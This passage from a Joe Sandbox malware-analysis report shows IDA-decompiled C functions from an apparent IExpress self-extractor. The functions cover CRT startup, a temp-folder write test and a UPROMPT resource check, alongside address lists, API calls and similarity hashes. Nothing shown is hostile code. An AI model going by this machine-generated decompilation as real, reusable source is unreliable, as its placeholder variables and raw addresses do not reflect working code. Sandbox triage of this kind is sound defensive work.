                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                      • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                      • API String ID: 2209512893-559176071
                                                                                                                                                                                                      • Opcode ID: 655704bb9b6b01ccf0ade246b2f4bc8783b81a36ede5035a1b64ec2d190c3628
                                                                                                                                                                                                      • Instruction ID: c4c53ef670135c0b935b9cb2b4c390a09ceaa59bbec85805b4328ec22e6947f4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 655704bb9b6b01ccf0ade246b2f4bc8783b81a36ede5035a1b64ec2d190c3628
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16116D35942229BBDB20DB929C0DDFFBEADEB517A5F1490A9B90CB2000D6304A48D6A1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 577 e76a60-e76a91 call e77155 call e77208 GetStartupInfoW 583 e76a93-e76aa2 577->583 584 e76aa4-e76aa6 583->584 585 e76abc-e76abe 583->585 587 e76aaf-e76aba Sleep 584->587 588 e76aa8-e76aad 584->588 586 e76abf-e76ac5 585->586 589 e76ac7-e76acf _amsg_exit 586->589 590 e76ad1-e76ad7 586->590 587->583 588->586 591 e76b0b-e76b11 589->591 592 e76b05 590->592 593 e76ad9-e76ae9 call e76c3f 590->593 595 e76b13-e76b24 _initterm 591->595 596 e76b2e-e76b30 591->596 592->591 597 e76aee-e76af2 593->597 595->596 598 e76b32-e76b39 596->598 599 e76b3b-e76b42 596->599 597->591 600 e76af4-e76b00 597->600 598->599 601 e76b67-e76b71 599->601 602 e76b44-e76b51 call e77060 599->602 604 e76c39-e76c3e call e7724d 600->604 603 e76b74-e76b79 601->603 602->601 610 e76b53-e76b65 602->610 607 e76bc5-e76bc8 603->607 608 e76b7b-e76b7d 603->608 611 e76bd6-e76be3 _ismbblead 607->611 612 e76bca-e76bd3 607->612 613 e76b94-e76b98 608->613 614 e76b7f-e76b81 608->614 610->601 616 e76be5-e76be6 611->616 617 e76be9-e76bed 611->617 612->611 619 e76ba0-e76ba2 613->619 620 e76b9a-e76b9e 613->620 614->607 618 e76b83-e76b85 614->618 616->617 617->603 618->613 622 e76b87-e76b8a 618->622 623 e76ba3-e76bbc call e72bfb 619->623 620->623 622->613 625 e76b8c-e76b92 622->625 627 e76c1e-e76c25 623->627 628 e76bbe-e76bbf exit 623->628 625->618 629 e76c27-e76c2d _cexit 627->629 630 e76c32 627->630 628->607 629->630 630->604
                                                                                                                                                                                                      C-Code - Quality: 51%
                                                                                                                                                                                                      			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int* _t25;
                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                                      				signed char _t41;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      				signed int _t54;
                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                      				signed int _t58;
                                                                                                                                                                                                      				signed int _t59;
                                                                                                                                                                                                      				intOrPtr* _t60;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				void* _t67;
                                                                                                                                                                                                      				void* _t68;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				E00E77155();
                                                                                                                                                                                                      				_push(0x58);
                                                                                                                                                                                                      				_push(0xe772b8);
                                                                                                                                                                                                      				E00E77208(__ebx, __edi, __esi);
                                                                                                                                                                                                      				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                      				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                      				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                      				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                      				_t53 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                      					if(0 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(0 != _t56) {
                                                                                                                                                                                                      						Sleep(0x3e8);
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t58 = 1;
                                                                                                                                                                                                      						_t53 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                      					_t67 =  *0xe788b0 - _t58; // 0x2
                                                                                                                                                                                                      					if(_t67 != 0) {
                                                                                                                                                                                                      						__eflags =  *0xe788b0; // 0x2
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							 *0xe781e4 = _t58;
                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							 *0xe788b0 = _t58;
                                                                                                                                                                                                      							_t37 = E00E76C3F(0xe710b8, 0xe710c4); // executed
                                                                                                                                                                                                      							__eflags = _t37;
                                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                                      								goto L13;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                      								_t30 = 0xff;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_push(0x1f);
                                                                                                                                                                                                      						L00E76FF4();
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						_t68 =  *0xe788b0 - _t58; // 0x2
                                                                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                                                                      							_push(0xe710b4);
                                                                                                                                                                                                      							_push(0xe710ac);
                                                                                                                                                                                                      							L00E77202();
                                                                                                                                                                                                      							 *0xe788b0 = 2;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if(_t53 == 0) {
                                                                                                                                                                                                      							 *0xe788ac = 0;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t71 =  *0xe788b4;
                                                                                                                                                                                                      						if( *0xe788b4 != 0 && E00E77060(_t71, 0xe788b4) != 0) {
                                                                                                                                                                                                      							_t60 =  *0xe788b4; // 0x0
                                                                                                                                                                                                      							 *0xe7a288(0, 2, 0);
                                                                                                                                                                                                      							 *_t60();
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t25 = __imp___acmdln; // 0x76665b9c
                                                                                                                                                                                                      						_t59 =  *_t25;
                                                                                                                                                                                                      						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							_t41 =  *_t59;
                                                                                                                                                                                                      							if(_t41 > 0x20) {
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							if(_t41 != 0) {
                                                                                                                                                                                                      								if(_t54 != 0) {
                                                                                                                                                                                                      									goto L32;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                      										_t59 = _t59 + 1;
                                                                                                                                                                                                      										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      										_t41 =  *_t59;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                      							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                      								_t29 = 0xa;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push(_t29);
                                                                                                                                                                                                      							_t30 = E00E72BFB(0xe70000, 0, _t59); // executed
                                                                                                                                                                                                      							 *0xe781e0 = _t30;
                                                                                                                                                                                                      							__eflags =  *0xe781f8;
                                                                                                                                                                                                      							if( *0xe781f8 == 0) {
                                                                                                                                                                                                      								exit(_t30); // executed
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags =  *0xe781e4;
                                                                                                                                                                                                      							if( *0xe781e4 == 0) {
                                                                                                                                                                                                      								__imp___cexit();
                                                                                                                                                                                                      								_t30 =  *0xe781e0; // 0x80070002
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                      							goto L40;
                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                      							__eflags = _t41 - 0x22;
                                                                                                                                                                                                      							if(_t41 == 0x22) {
                                                                                                                                                                                                      								__eflags = _t54;
                                                                                                                                                                                                      								_t15 = _t54 == 0;
                                                                                                                                                                                                      								__eflags = _t15;
                                                                                                                                                                                                      								_t54 = 0 | _t15;
                                                                                                                                                                                                      								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                      							__imp___ismbblead(_t26);
                                                                                                                                                                                                      							__eflags = _t26;
                                                                                                                                                                                                      							if(_t26 != 0) {
                                                                                                                                                                                                      								_t59 = _t59 + 1;
                                                                                                                                                                                                      								__eflags = _t59;
                                                                                                                                                                                                      								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t59 = _t59 + 1;
                                                                                                                                                                                                      							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L40:
                                                                                                                                                                                                      					return E00E7724D(_t30);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t58 = 1;
                                                                                                                                                                                                      				__eflags = 1;
                                                                                                                                                                                                      				goto L7;
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x00e76a60
                                                                                                                                                                                                      0x00e76a6a
                                                                                                                                                                                                      0x00e76a6c
                                                                                                                                                                                                      0x00e76a71
                                                                                                                                                                                                      0x00e76a78
                                                                                                                                                                                                      0x00e76a7f
                                                                                                                                                                                                      0x00e76a85
                                                                                                                                                                                                      0x00e76a8e
                                                                                                                                                                                                      0x00e76a91
                                                                                                                                                                                                      0x00e76a93
                                                                                                                                                                                                      0x00e76a9c
                                                                                                                                                                                                      0x00e76aa2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76aa6
                                                                                                                                                                                                      0x00e76ab4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76aa8
                                                                                                                                                                                                      0x00e76aaa
                                                                                                                                                                                                      0x00e76aab
                                                                                                                                                                                                      0x00e76aab
                                                                                                                                                                                                      0x00e76abf
                                                                                                                                                                                                      0x00e76abf
                                                                                                                                                                                                      0x00e76ac5
                                                                                                                                                                                                      0x00e76ad1
                                                                                                                                                                                                      0x00e76ad7
                                                                                                                                                                                                      0x00e76b05
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76ad9
                                                                                                                                                                                                      0x00e76ad9
                                                                                                                                                                                                      0x00e76ae9
                                                                                                                                                                                                      0x00e76af0
                                                                                                                                                                                                      0x00e76af2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76af4
                                                                                                                                                                                                      0x00e76af4
                                                                                                                                                                                                      0x00e76afb
                                                                                                                                                                                                      0x00e76afb
                                                                                                                                                                                                      0x00e76af2
                                                                                                                                                                                                      0x00e76ac7
                                                                                                                                                                                                      0x00e76ac7
                                                                                                                                                                                                      0x00e76ac9
                                                                                                                                                                                                      0x00e76b0b
                                                                                                                                                                                                      0x00e76b0b
                                                                                                                                                                                                      0x00e76b11
                                                                                                                                                                                                      0x00e76b13
                                                                                                                                                                                                      0x00e76b18
                                                                                                                                                                                                      0x00e76b1d
                                                                                                                                                                                                      0x00e76b24
                                                                                                                                                                                                      0x00e76b24
                                                                                                                                                                                                      0x00e76b30
                                                                                                                                                                                                      0x00e76b39
                                                                                                                                                                                                      0x00e76b39
                                                                                                                                                                                                      0x00e76b3b
                                                                                                                                                                                                      0x00e76b42
                                                                                                                                                                                                      0x00e76b57
                                                                                                                                                                                                      0x00e76b5f
                                                                                                                                                                                                      0x00e76b65
                                                                                                                                                                                                      0x00e76b65
                                                                                                                                                                                                      0x00e76b67
                                                                                                                                                                                                      0x00e76b6c
                                                                                                                                                                                                      0x00e76b6e
                                                                                                                                                                                                      0x00e76b71
                                                                                                                                                                                                      0x00e76b74
                                                                                                                                                                                                      0x00e76b74
                                                                                                                                                                                                      0x00e76b79
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76b7d
                                                                                                                                                                                                      0x00e76b81
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76b83
                                                                                                                                                                                                      0x00e76b8c
                                                                                                                                                                                                      0x00e76b8d
                                                                                                                                                                                                      0x00e76b90
                                                                                                                                                                                                      0x00e76b90
                                                                                                                                                                                                      0x00e76b83
                                                                                                                                                                                                      0x00e76b81
                                                                                                                                                                                                      0x00e76b94
                                                                                                                                                                                                      0x00e76b98
                                                                                                                                                                                                      0x00e76ba2
                                                                                                                                                                                                      0x00e76b9a
                                                                                                                                                                                                      0x00e76b9a
                                                                                                                                                                                                      0x00e76b9a
                                                                                                                                                                                                      0x00e76ba3
                                                                                                                                                                                                      0x00e76bab
                                                                                                                                                                                                      0x00e76bb0
                                                                                                                                                                                                      0x00e76bb5
                                                                                                                                                                                                      0x00e76bbc
                                                                                                                                                                                                      0x00e76bbf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76bbf
                                                                                                                                                                                                      0x00e76c1e
                                                                                                                                                                                                      0x00e76c25
                                                                                                                                                                                                      0x00e76c27
                                                                                                                                                                                                      0x00e76c2d
                                                                                                                                                                                                      0x00e76c2d
                                                                                                                                                                                                      0x00e76c32
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76bc5
                                                                                                                                                                                                      0x00e76bc5
                                                                                                                                                                                                      0x00e76bc8
                                                                                                                                                                                                      0x00e76bcc
                                                                                                                                                                                                      0x00e76bce
                                                                                                                                                                                                      0x00e76bce
                                                                                                                                                                                                      0x00e76bd1
                                                                                                                                                                                                      0x00e76bd3
                                                                                                                                                                                                      0x00e76bd3
                                                                                                                                                                                                      0x00e76bd6
                                                                                                                                                                                                      0x00e76bda
                                                                                                                                                                                                      0x00e76be1
                                                                                                                                                                                                      0x00e76be3
                                                                                                                                                                                                      0x00e76be5
                                                                                                                                                                                                      0x00e76be5
                                                                                                                                                                                                      0x00e76be6
                                                                                                                                                                                                      0x00e76be6
                                                                                                                                                                                                      0x00e76be9
                                                                                                                                                                                                      0x00e76bea
                                                                                                                                                                                                      0x00e76bea
                                                                                                                                                                                                      0x00e76b74
                                                                                                                                                                                                      0x00e76c39
                                                                                                                                                                                                      0x00e76c3e
                                                                                                                                                                                                      0x00e76c3e
                                                                                                                                                                                                      0x00e76abe
                                                                                                                                                                                                      0x00e76abe
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E77155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00E77182
                                                                                                                                                                                                        • Part of subcall function 00E77155: GetCurrentProcessId.KERNEL32 ref: 00E77191
                                                                                                                                                                                                        • Part of subcall function 00E77155: GetCurrentThreadId.KERNEL32 ref: 00E7719A
                                                                                                                                                                                                        • Part of subcall function 00E77155: GetTickCount.KERNEL32 ref: 00E771A3
                                                                                                                                                                                                        • Part of subcall function 00E77155: QueryPerformanceCounter.KERNEL32(?), ref: 00E771B8
                                                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?,00E772B8,00000058), ref: 00E76A7F
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 00E76AB4
                                                                                                                                                                                                      • _amsg_exit.MSVCRT ref: 00E76AC9
                                                                                                                                                                                                      • _initterm.MSVCRT ref: 00E76B1D
                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00E76B49
                                                                                                                                                                                                      • exit.KERNELBASE ref: 00E76BBF
                                                                                                                                                                                                      • _ismbblead.MSVCRT ref: 00E76BDA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 836923961-0
                                                                                                                                                                                                      • Opcode ID: 6ed40530b07478b378ed04737f4b6998e04c0ab14e8eda59030e03a091de18b0
                                                                                                                                                                                                      • Instruction ID: 6eb9ebac67838eb8a951b96dde579978801ff9f4b4afc81be683e09b193ba5e3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ed40530b07478b378ed04737f4b6998e04c0ab14e8eda59030e03a091de18b0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3411470944B65CFEB25DB69DD097A97BE0EB45729F54E02AE84DF32A1CF304C848B81
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 631 e758c8-e758d5 632 e758d8-e758dd 631->632 632->632 633 e758df-e758f1 LocalAlloc 632->633 634 e758f3-e75901 call e744b9 633->634 635 e75919-e75959 call e71680 call e7658a CreateFileA LocalFree 633->635 638 e75906-e75910 call e76285 634->638 635->638 645 e7595b-e7596c CloseHandle GetFileAttributesA 635->645 644 e75912-e75918 638->644 645->638 646 e7596e-e75970 645->646 646->638 647 e75972-e7597b 646->647 647->644
                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E00E758C8(intOrPtr* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				signed char _t16;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				intOrPtr* _t27;
                                                                                                                                                                                                      				CHAR* _t33;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t33 = __ecx;
                                                                                                                                                                                                      				_t27 = __ecx;
                                                                                                                                                                                                      				_t23 = __ecx + 1;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t6 =  *_t27;
                                                                                                                                                                                                      					_t27 = _t27 + 1;
                                                                                                                                                                                                      				} while (_t6 != 0);
                                                                                                                                                                                                      				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                      				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                      				if(_t20 != 0) {
                                                                                                                                                                                                      					E00E71680(_t20, _t36, _t33);
                                                                                                                                                                                                      					E00E7658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                      					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                      					_v8 = _t10;
                                                                                                                                                                                                      					LocalFree(_t20);
                                                                                                                                                                                                      					_t12 = _v8;
                                                                                                                                                                                                      					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                      						goto L4;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						CloseHandle(_t12);
                                                                                                                                                                                                      						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                      						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							 *0xe79124 = 0;
                                                                                                                                                                                                      							_t14 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E00E744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                      					 *0xe79124 = E00E76285();
                                                                                                                                                                                                      					_t14 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t14;
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      0x00e758cd
                                                                                                                                                                                                      0x00e758d1
                                                                                                                                                                                                      0x00e758d3
                                                                                                                                                                                                      0x00e758d5
                                                                                                                                                                                                      0x00e758d8
                                                                                                                                                                                                      0x00e758d8
                                                                                                                                                                                                      0x00e758da
                                                                                                                                                                                                      0x00e758db
                                                                                                                                                                                                      0x00e758e1
                                                                                                                                                                                                      0x00e758ed
                                                                                                                                                                                                      0x00e758f1
                                                                                                                                                                                                      0x00e7591e
                                                                                                                                                                                                      0x00e7592c
                                                                                                                                                                                                      0x00e75943
                                                                                                                                                                                                      0x00e7594a
                                                                                                                                                                                                      0x00e7594d
                                                                                                                                                                                                      0x00e75953
                                                                                                                                                                                                      0x00e75959
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7595b
                                                                                                                                                                                                      0x00e7595c
                                                                                                                                                                                                      0x00e75963
                                                                                                                                                                                                      0x00e7596c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75972
                                                                                                                                                                                                      0x00e75974
                                                                                                                                                                                                      0x00e7597a
                                                                                                                                                                                                      0x00e7597a
                                                                                                                                                                                                      0x00e7596c
                                                                                                                                                                                                      0x00e758f3
                                                                                                                                                                                                      0x00e75901
                                                                                                                                                                                                      0x00e75906
                                                                                                                                                                                                      0x00e7590b
                                                                                                                                                                                                      0x00e75910
                                                                                                                                                                                                      0x00e75910
                                                                                                                                                                                                      0x00e75918

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00E75534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E758E7
                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00E75534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E75943
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00E75534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E7594D
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00E75534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E7595C
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00E75534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E75963
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                      • API String ID: 747627703-3104274291
                                                                                                                                                                                                      • Opcode ID: c58a7fb9040f4e0bb3a04d4173957b384e03ce40cc017ade6f1d8f8aa7b8a28d
                                                                                                                                                                                                      • Instruction ID: c018252c0a89fd4da37e763c2480704161def7a82ad08dd1b54e5fc64975f621
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c58a7fb9040f4e0bb3a04d4173957b384e03ce40cc017ade6f1d8f8aa7b8a28d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC1138727013116BD7249F7A6C0DB9B7F9DDFC6364B109A25F61DF31D1DAB0884982A0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E751E5(void* __eflags) {
                                                                                                                                                                                                      				int _t5;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t1 = E00E7468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                      				if(_t28 != 0) {
                                                                                                                                                                                                      					if(E00E7468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                      						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                      						if(_t5 != 0) {
                                                                                                                                                                                                      							_t6 = E00E744B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                      							LocalFree(_t28);
                                                                                                                                                                                                      							if(_t6 != 6) {
                                                                                                                                                                                                      								 *0xe79124 = 0x800704c7;
                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                      								return 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *0xe79124 = 0;
                                                                                                                                                                                                      							L6:
                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						LocalFree(_t28);
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					E00E744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					LocalFree(_t28);
                                                                                                                                                                                                      					 *0xe79124 = 0x80070714;
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E00E744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      				 *0xe79124 = E00E76285();
                                                                                                                                                                                                      				goto L10;
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      0x00e751fb
                                                                                                                                                                                                      0x00e75207
                                                                                                                                                                                                      0x00e7520b
                                                                                                                                                                                                      0x00e7523c
                                                                                                                                                                                                      0x00e75268
                                                                                                                                                                                                      0x00e75270
                                                                                                                                                                                                      0x00e7528b
                                                                                                                                                                                                      0x00e75293
                                                                                                                                                                                                      0x00e7529c
                                                                                                                                                                                                      0x00e752a6
                                                                                                                                                                                                      0x00e752b0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e752b0
                                                                                                                                                                                                      0x00e7529e
                                                                                                                                                                                                      0x00e75279
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7527b
                                                                                                                                                                                                      0x00e75273
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75273
                                                                                                                                                                                                      0x00e7524a
                                                                                                                                                                                                      0x00e75250
                                                                                                                                                                                                      0x00e75256
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75256
                                                                                                                                                                                                      0x00e75219
                                                                                                                                                                                                      0x00e75223
                                                                                                                                                                                                      0x00000000

